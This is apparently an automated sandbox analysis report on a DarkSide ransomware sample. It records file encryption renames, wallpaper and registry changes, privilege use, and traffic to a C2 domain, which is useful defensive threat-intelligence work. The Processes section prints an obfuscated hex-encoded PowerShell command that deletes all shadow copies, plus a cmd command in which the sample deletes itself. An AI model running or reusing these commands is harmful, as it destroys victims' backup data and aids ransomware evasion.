Malware Analysis Report

2024-10-16 03:30

Sample ID 220131-gprlfageb9
Target adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e
SHA256 adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e
Tags
darkside ransomware spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e

Threat Level: Known bad

The file adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e was found to be: Known bad.

Malicious Activity Summary

darkside ransomware spyware stealer

DarkSide

Modifies extensions of user files

Deletes itself

Reads user/profile data of web browsers

Sets desktop wallpaper using registry

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies Control Panel

Modifies registry class

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-31 05:59

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-31 05:59

Reported

2022-01-31 07:33

Platform

win7-en-20211208

Max time kernel

122s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe"

Signatures

DarkSide

ransomware darkside

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\ExpandImport.crw.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
File opened for modification C:\Users\Admin\Pictures\MergeReset.crw.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
File renamed C:\Users\Admin\Pictures\SetMove.png => C:\Users\Admin\Pictures\SetMove.png.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
File opened for modification C:\Users\Admin\Pictures\SetMove.png.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
File renamed C:\Users\Admin\Pictures\ExpandImport.crw => C:\Users\Admin\Pictures\ExpandImport.crw.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
File opened for modification C:\Users\Admin\Pictures\ExportUnblock.png.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
File renamed C:\Users\Admin\Pictures\ProtectEnable.png => C:\Users\Admin\Pictures\ProtectEnable.png.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
File renamed C:\Users\Admin\Pictures\ExportUnblock.png => C:\Users\Admin\Pictures\ExportUnblock.png.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
File renamed C:\Users\Admin\Pictures\DenyAssert.crw => C:\Users\Admin\Pictures\DenyAssert.crw.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
File renamed C:\Users\Admin\Pictures\MergeReset.crw => C:\Users\Admin\Pictures\MergeReset.crw.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
File renamed C:\Users\Admin\Pictures\SkipBackup.tif => C:\Users\Admin\Pictures\SkipBackup.tif.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
File opened for modification C:\Users\Admin\Pictures\CopyCheckpoint.raw.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
File opened for modification C:\Users\Admin\Pictures\DenyAssert.crw.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
File opened for modification C:\Users\Admin\Pictures\ProtectEnable.png.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
File opened for modification C:\Users\Admin\Pictures\SkipBackup.tif.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
File renamed C:\Users\Admin\Pictures\CopyCheckpoint.raw => C:\Users\Admin\Pictures\CopyCheckpoint.raw.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\27a6f0b5.BMP" C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\27a6f0b5.BMP" C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A

Enumerates physical storage devices

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.27a6f0b5\ = "27a6f0b5" C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\27a6f0b5\DefaultIcon C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\27a6f0b5 C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\27a6f0b5\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\27a6f0b5.ico" C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1964 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1964 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1964 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1964 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1964 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe C:\Windows\SysWOW64\cmd.exe
PID 1964 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe C:\Windows\SysWOW64\cmd.exe
PID 1964 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe C:\Windows\SysWOW64\cmd.exe
PID 1964 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe

"C:\Users\Admin\AppData\Local\Temp\adcb912694b1abcdf9c467b5d47abe7590b590777b88045d10992d34a27aa06e.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\ADCB91~1.EXE >> NUL

Network

Country Destination Domain Proto
US 8.8.8.8:53 securebestapp20.com udp
DE 3.64.163.50:443 securebestapp20.com tcp
US 8.8.8.8:53 53.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 6.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 21.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 71.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 1.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 3.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 2.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 35.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 51.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 14.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 18.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 81.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 83.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 22.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 85.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 87.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 89.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 93.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 97.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 34.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 95.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 36.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 11.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 15.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 44.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 46.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 19.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 52.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 58.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 39.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 64.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 70.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 72.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 74.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 76.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 80.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 59.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 84.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 65.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 127.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 100.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 98.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 117.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 107.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 92.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 78.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 99.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 91.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 111.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 126.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 109.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 120.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 105.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 122.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 118.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 124.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 116.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 113.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 114.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 110.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 108.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 104.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 106.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 102.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 103.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 96.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 125.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 121.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 94.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 119.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 115.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 88.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 86.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 123.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 112.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 130.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 220.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 168.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 151.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 149.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 176.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 155.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 190.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 226.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 222.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 150.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 152.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 224.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 157.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 228.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 159.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 238.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 137.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 246.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 242.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 161.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 163.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 143.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 167.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 146.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 154.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 158.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 173.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 171.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 170.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 172.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 169.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 174.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 128.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 178.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 132.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 180.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 182.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 134.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 184.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 136.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 186.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 140.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 188.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 142.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 194.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 145.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 131.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 133.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 135.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 147.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 192.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 196.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 198.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 200.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 202.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 204.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 208.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 206.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 214.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 212.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 216.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 230.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 234.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 240.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 244.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 248.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 129.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 139.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 148.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 160.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 162.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 156.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 164.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 166.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 232.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 213.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 209.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 236.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 217.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 250.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 221.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 254.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 252.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 239.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 243.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 253.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 165.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 175.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 181.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 193.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 197.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 199.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 207.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 237.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 241.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 245.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 251.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 201.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 249.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 203.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 233.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 247.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 177.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 179.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 183.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 187.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 191.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 195.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 225.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 185.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 189.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 211.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.0.127.10.in-addr.arpa udp
